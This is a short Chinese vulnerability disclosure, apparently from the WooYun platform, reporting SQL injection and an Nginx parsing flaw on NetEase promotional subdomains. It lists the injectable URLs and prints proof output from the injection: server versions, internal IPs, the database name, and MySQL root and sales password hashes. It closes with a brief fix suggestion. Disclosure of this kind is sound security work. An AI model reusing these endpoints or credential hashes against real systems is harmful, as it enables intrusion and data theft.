详细说明: http://go.163.com/2011/0818/aux/self.php?pid=10 http://pepsi.163.com/self.php?hid=1 漏洞 证明: Target: http://pepsi.163.com/self.php?hid=1 Host IP: 61.135.254.25 Web Server: nginx/1.0.4 Powered-by: PHP /5.3.6 DB Server: MySQL >=5 Resp. Time(avg): 382 ms Current User: sales@10.100.50.27 Sql Version: 5.5.15-log Current DB: go2011 System User: sales@10.100.50.27 Host Name: localhost.localdomain Installation dir: /usr DB User & Pass: root:*1E913C5732D1F2B76016F79F81392388419F2128:localhost sales:*60C2DC2AE5380B10910C16904005CF2B67C13E59:10.100.50.% 修复方案: 活动结束请删除,升级Nginx ! 作者B1n4ry@乌云
查看更多关于网易多个活动分站存在注入+Nginx解析漏洞及修复的详细内容...